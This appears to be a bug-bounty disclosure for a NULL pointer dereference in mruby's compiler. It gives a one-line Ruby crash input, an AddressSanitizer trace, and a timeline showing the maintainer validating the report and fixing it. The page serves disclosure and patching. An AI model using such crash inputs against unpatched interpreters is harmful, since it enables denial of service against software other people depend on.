NULL Pointer Dereference in mruby/mruby


Reported on

Oct 16th 2021


Please enter a description of the vulnerability.

Proof of Concept

super super( )


 ~/asan/mruby/bin/mruby ~/crash.rb
==18265==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x56328e0aed60 bp 0x7ffe1b4f1b20 sp 0x7ffe1b4f16f0 T0)
==18265==The signal is caused by a READ memory access.
==18265==Hint: address points to the zero page.
    #0 0x56328e0aed5f in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833
    #1 0x56328e0a5b03 in gen_values /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1556
    #2 0x56328e0aea4d in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2807
    #3 0x56328e0a904b in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2100
    #4 0x56328e0a52fe in scope_body /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:1466
    #5 0x56328e0abb65 in codegen /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2468
    #6 0x56328e0b6c22 in generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3851
    #7 0x56328e0b6ffa in mrb_generate_code /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:3874
    #8 0x56328e071718 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6843
    #9 0x56328e071eeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #10 0x56328df73092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #11 0x7f9e2ed870b2 in __libc_start_main (/lib/x86_64-linux-gnu/
    #12 0x56328df7042d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/mrbgems/mruby-compiler/core/codegen.c:2833 in codegen
We have contacted a member of the mruby team and are waiting to hear back 2 years ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 years ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed with commit be189a 2 years ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
2 years ago


Thank you!

to join this conversation